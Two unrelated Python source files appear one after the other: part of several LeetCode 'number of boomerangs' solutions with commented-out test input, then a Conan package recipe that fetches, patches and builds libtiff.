distance = [[0] * len(points) for _ in range(len(points))]
for i in range(len(points)):
for j in range(i):
distance[i][j] = (points[i][0]-points[j][0])**2 + (points[i][1]-points[j][1])**2
# distance[i][j] = math.sqrt((points[i][0]-points[j][0])**2
# + (points[i][1]-points[j][1])**2)
distance[j][i] = distance[i][j]
for m in range(i):
if distance[i][j] == distance[i-1-m][j]:
result.append([points[i], points[j], points[i-1-m]])
result.append([points[i-1-m], points[j], points[i]])
for m in range(j):
if distance[i][j] == distance[i][j-1-m]:
result.append([points[j], points[i], points[j-1-m]])
result.append([points[j-1-m], points[i], points[j]])
return len(result)
def numberOfBoomerangs(self, points):
"""
:type points: List[List[int]]
:rtype: int
"""
count = 0
data = {}
for i in range(len(points)):
for j in range(i):
distance = (points[i][0]-points[j][0])**2 + (points[i][1]-points[j][1])**2
exts = data.get(distance)
if not exts:
data[distance] = [[i,j]]
else:
for ext in exts:
if ext[0] == i or ext[0] == j or ext[1] == i or ext[1] == j:
count += 2
data[distance].append([i,j])
return count
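# A common alternative sketch (not from the original file): bucket squared
# distances per pivot point; a bucket holding v equidistant points yields
# v * (v - 1) ordered (j, k) pairs.
def numberOfBoomerangs_hashmap(self, points):
    """
    :type points: List[List[int]]
    :rtype: int
    """
    total = 0
    for px, py in points:
        buckets = {}
        for qx, qy in points:
            d = (px - qx) ** 2 + (py - qy) ** 2
            buckets[d] = buckets.get(d, 0) + 1
        # the d == 0 bucket (the pivot paired with itself) has v == 1 and adds 0
        total += sum(v * (v - 1) for v in buckets.values())
    return total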
# if __name__ == '__main__':
# s = Solution()
# print s.numberOfBoomerangs([[0, 0], [1, 0], [2, 0]])
# print s.numberOfBoomerangs([[3327,-549],[9196,-8118],[7610,-9506],[5098,8392],[8582,7953],[1053,5802],[3847,2652],[7654,8355],[1614,-9409],[9986,5538],[4660,2944],[4528,-9512],[7483,-1455],[3422,-3966],[2037,-4456],[5107,-4635],[4996,655],[7247,2606],[1149,8697],[7350,6083],[3002,8403],[8238,6850],[1055,5892],[5205,9021],[2835,5191],[911,-2505],[4488,-4561],[7983,-1677],[336,-2243],[4358,-1274],[3302,9465],[4091,-5350],[120,7690],[3608,7622],[6388,-9042],[57,-610],[9361,8295],[6240,-3232],[540,7797],[2141,-6625],[9341,3053],[7223,3829],[4844,1558],[2152,-8467],[9316,6510],[259,-1030],[2327,-5650],[9972,8800],[2040,-6420],[2774,4780],[4538,-7169],[4171,-6101],[7479,-3237],[7019,-1981],[4561,-4488],[7746,254],[4917,4969],[4083,-238],[6528,-7413],[1295,-7804],[5450,-8446],[1166,-5871],[2256,-8862],[2929,-5704],[4718,2055],[5429,-4392],[4887,9600],[9507,-1282],[2715,2878],[6737,-6372],[8390,-9165],[3882,3308],[5805,4317],[9422,8685],[3257,-2931],[881,-1293],[8623,-1601],[2836,879],[5889,2118],[1527,607],[4173,-3044],[6215,5412],[2908,-7926],[4130,-8024],[1304,7219],[1956,-3954],[8055,5839],[5706,212],[6508,5128],[8897,9765],[2197,-3870],[8472,-2828],[4529,7661],[4403,-9582],[6131,-7717],[7377,-3344],[5591,9944],[2069,-5148],[8370,-7449],[6828,-3974],[6123,-1216],[2072,530],[975,-2221],[7094,-2516],[9259,-4009],[7249,7809],[8473,2074],[4981,-6998],[9735,5737],[9772,5866],[8020,-6499],[8874,-6389],[3445,-9057],[4815,8167],[9847,1643],[4193,2322],[6780,2617],[9204,4107],[396,6298],[1591,6008],[2289,-4807],[3817,762],[7267,5150],[116,-6646],[887,-3760],[5572,-4741],[9741,4446],[5223,-462],[1742,38],[7705,1589],[1682,-1750],[263,4814],[867,9467],[8921,7616],[5765,-3135],[3624,4406],[2058,-2559],[1520,-675],[2591,-2012],[2679,-169],[4228,-1749],[5090,-6031],[2697,-9687],[9859,791],[352,3916],[8732,-1614],[2166,8995],[3200,9385],[4814,-1527],[7001,579],[5338,-3023],[1337,-2604],[4418,-7143],[3073,3362],[845,-7896],[3193,-8575],[6707,4635],[1746,-595],[4949,1605],[6548,-8347],[1873,5281],[39,-5961],[4276,-409],[9777,-909],[8064,3130],[6022,-245],[108,7360],[7151,4526],[6569,-3423],[4240,-2585],[8681,-2567],[5192,5389],[2069,-3061],[1146,3370],[4896,7694],[5023,6770],[2975,-8586],[7161,-6396],[1005,6938],[2695,-4579],[69,-4931],[5176,177],[2429,-1320],[1055,8999],[5257,-4704],[2766,-6062],[9081,-2042],[5679,-2498],[1249,6825],[7224,-3854],[872,2247],[2916,-6153],[3661,-9923],[7451,-8982],[7016,6498],[6440,-6563],[1568,-8384],[9966,-9651],[296,1021],[9348,-8095],[2669,8466],[2196,-8249],[2777,7875],[5605,4026],[1053,-7170],[172,-8075],[1429,-6912],[5772,-8557],[9518,-424],[2461,2886],[2426,-1099],[6323,-6006],[6870,-3711],[696,3518],[3662,6396],[5424,-3668],[4863,7620],[4435,7640],[1847,-3608],[8018,-7100],[9222,-5457],[4825,7004],[3983,-3050],[8447,-6499],[2878,-9092],[6387,5304],[6162,-938],[5651,3032],[5351,6347],[2902,-4634],[2743,8326],[8050,-6042],[2298,-1163],[7950,-9502],[5229,-4031],[3398,-9196],[512,-5424],[7808,847],[7878,6255],[4349,7108],[7163,736],[8764,9677],[6151,-5585],[2709,-2146],[7114,5612],[3220,-3790],[290,-8730],[168,8941],[107,-5529],[9439,-8311],[440,9189],[2493,7304],[117,6653],[8151,-5653],[2908,8852],[1455,-3577],[5941,-3428],[6101,-7908],[7339,5162],[9946,-5546],[7126,9519],[7016,3769],[789,7184],[2710,-2751],[1655,-1499],[5290,-1553],[4042,-2217],[2103,-9488],[788,-3393],[1211,3696],[1811,9019],[6471,-2248],[5591,8924],[6196,2930],[4087,6143],[3736,7565],[5662,-9248],[1334,2803],[4289,-9604],[6404,2296],[8897,-8306],[7096,-708],[5829,9199],[6156,-3383],[2158,-2633],[6665,-9678],[6386,3137],[8074,1977],[2061,4271],[4908,-7500],[6766,4996],[66,8780],[5749,1400],[7935,38],[1797,-5660],[2334,7046],[2386,9430],[2690,-1784],[4982,-1154],[1185,3492],[6214,-2149],[3814,8952],[7340,8241],[930,-4247],[8864,2190],[8254,5630],[7186,-5328],[762,9287],[6072,8697],[9325,-5779],[9389,1660],[7620,-8224],[7442,-9690],[9992,-7576],[5509,7529],[2269,8075],[5380,-3917],[7027,-7280],[4324,-5691],[8474,3188],[6499,3080],[5170,-9962],[7752,5932],[9325,176],[982,-1349],[4398,371],[6663,-1630],[2147,-9543],[5032,8491],[9234,541],[6021,1503],[8616,7753],[3938,-8004],[6826,8263],[6305,-8348],[7803,9157],[4732,-674],[9195,-1164],[5258,8520],[9012,2592],[3523,-238],[2964,6538],[8132,1463],[3348,-6835],[6307,2582],[58,-7672],[437,5027],[6433,4375],[7023,3259],[8990,-6672],[4911,3146],[2485,-4005],[2472,8032],[4831,-5918],[2905,196],[6675,6428],[9958,9639],[9319,4443],[7454,-7333],[3960,3761],[1601,-9630],[2441,2038],[5397,-1125],[6413,2420],[8486,1756],[2101,3398],[4902,938],[5745,-2626],[5323,-3071],[1456,8228],[7125,-1869],[1008,3435],[4122,6679],[4230,1577],[9346,8190],[1690,947],[4913,4132],[9337,310],[3007,-4249],[9083,-8507],[7507,-2464],[1243,-7591],[4826,-3011],[6135,-9851],[3918,7591],[8377,-2605],[5723,-4262],[830,-3803],[2417,-8587],[7774,8116],[5955,9465],[5415,868],[9949,-5247],[1179,2956],[6856,6614],[801,-9285],[4150,8397],[9476,8976],[1738,-4389],[9126,2008],[3202,3855],[9403,-4723],[9593,6585],[1475,-7989],[7998,-4399],[127,306],[1418,-4458],[1174,1367],[6647,-7647],[4323,3503],[8967,1477],[4218,9469],[6226,3694],[8446,-2036],[9305,3924],[9972,8860],[7779,5727],[4137,-6275],[8664,1964],[5736,-6985],[7566,-7785],[3321,8984],[4109,4495],[352,757],[3201,1027],[4260,-1480],[8856,4831],[7990,-4918],[8525,-7212],[3046,-5817],[6712,-630],[3043,-5509],[1449,-6468],[8216,-3534],[5497,304],[9481,3063],[8871,9154],[8399,2981],[1,8751],[90,-6798],[6131,-9298],[8075,-5013],[5533,6065],[70,-9589],[5205,9468],[946,1917],[5191,-6011],[2760,-7008],[3873,7329],[9458,9370],[7633,5291],[8785,2857],[797,3537],[2190,-9201],[2288,-7720],[353,4771],[9334,-1572],[9759,1220],[845,-3819],[7983,6050],[2001,-1071],[4319,-2808],[9270,7080],[6537,3143],[4409,2347],[8866,8394],[7639,4003],[7603,4788],[7540,-207],[5587,6181],[8425,5941],[952,-5888],[721,-2937],[5332,-8433],[3244,-6685],[3969,5246],[2244,8289],[8790,-8486],[1721,-4673],[1009,-3870],[7675,9875],[876,-8334],[231,-1520],[6454,7771],[4625,2042],[304,9403],[4335,-8743],[3515,-4944],[4672,8847],[2975,7917],[8514,6945],[3163,758],[1586,1953],[8624,-6693],[7281,9633],[5789,1308],[5861,-6983],[2974,-3908],[7849,-572],[215,-7525]])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from conans import ConanFile, CMake, tools
import os
import shutil
class LibtiffConan(ConanFile):
name = "libtiff"
description = "Library for Tag Image File Format (TIFF)"
url = "https://github.com/conan-io/conan-center-index"
author = "Bincrafters <bincrafters@gmail.com>"
license = "MIT"
homepage = "http://www.simplesystems.org/libtiff"
topics = ("tiff", "image", "bigtiff", "tagged-image-file-format")
exports_sources = ["CMakeLists.txt"]
generators = "cmake"
settings = "os", "compiler", "build_type", "arch"
options = {"shared": [True, False], "fPIC": [True, False]}
default_options = {'shared': False, 'fPIC': True}
requires = "zlib/1.2.11"
_source_subfolder = "source_subfolder"
def config_options(self):
if self.settings.os == "Windows":
self.options.remove("fPIC")
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
def source(self):
tools.get(**self.conan_data["sources"][self.version])
os.rename('tiff-' + self.version, self._source_subfolder)
os.rename(os.path.join(self._source_subfolder, "CMakeLists.txt"),
os.path.join(self._source_subfolder, "CMakeListsOriginal.txt"))
shutil.copy("CMakeLists.txt",
os.path.join(self._source_subfolder, "CMakeLists.txt"))
def build(self):
cmake = CMake(self)
cmake.definitions['CMAKE_INSTALL_LIBDIR'] = 'lib'
cmake.definitions['CMAKE_INSTALL_BINDIR'] = 'bin'
cmake.definitions['CMAKE_INSTALL_INCLUDEDIR'] = 'include'
cmake.definitions["lzma"] = False
cmake.definitions["jpeg"] = False
cmake.definitions["jbig"] = False
if self.options.shared and self.settings.compiler == "Visual Studio":
# https://github.com/Microsoft/vcpkg/blob/master/ports/tiff/fix-cxx-shared-libs.patch
tools.replace_in_file(os.path.join(self._source_subfolder, 'libtiff', 'CMakeLists.txt'),
r'set_target_properties(tiffxx PROPERTIES SOVERSION ${SO_COMPATVERSION})',
r'set_target_properties(tiffxx PROPERTIES SOVERSION ${SO_COMPATVERSION} '
r'WINDOWS_EXPORT_ALL_SYMBOLS ON)')
if self.settings.os == "Windows" and self.settings.compiler != "Visual Studio":
tools.replace_in_file(os.path.join(self._source_subfolder, "CMakeListsOriginal.txt"),
"find_library(M_LIBRARY m)",
"if (NOT MINGW)\n find_library(M_LIBRARY m)\nendif()")
if self.version == '4.0.8':
# only one occurrence must be patched. fixed in 4.0.9
tools.replace_in_file(os.path.join(self._source_subfolder, "CMakeListsOriginal.txt"),
"if (UNIX)",
"if (UNIX OR MINGW)")
tools.replace_in_file(os.path.join(self._source_subfolder, "CMakeListsOriginal.txt"),
"add_subdirectory(tools)\nadd_subdirectory(test)\nadd_subdirectory(contrib)\nadd_subdirectory(build)\n"
"add_subdirectory(man)\nadd_subdirectory(html)", "")
cmake.definitions["BUILD_SHARED_LIBS"] = self.options.shared
cmake.configure(source_folder=self._source_subfolder)
cmake.build()
cmake.install()
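# note: install runs at build time here, so package() below only collects the license file and prunes pkg-config files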
def package(self):
self.copy("COPYRIGHT", src=self._source_subfolder, dst="licenses", ignore_case=True, keep_path=False)
tools.rmdir(os.path.join(self.package_folder, 'lib', 'pkgconfig'))
def package_info(self):
self.cpp_info.libs = ["tiff", "tiffxx"]
if self.settings.os == "Windows" and self.settings.build_type == "Debug" and self.settings.compiler == 'Visual Studio':
self.cpp_info.libs = [lib+'d' for lib in self.cpp_info.libs]
if self.options.shared and self.settings.os == "Windows" and self.settings.compiler != 'Visual Studio':
self.cpp_info.libs = [lib+'.dll' for lib in self.cpp_info.libs]
if self.settings.os == "Linux":
self.cpp_info.libs.append("m")
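# Typical local build (assumed conan v1 workflow): conan create . libtiff/4.0.9@ -o libtiff:shared=True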
|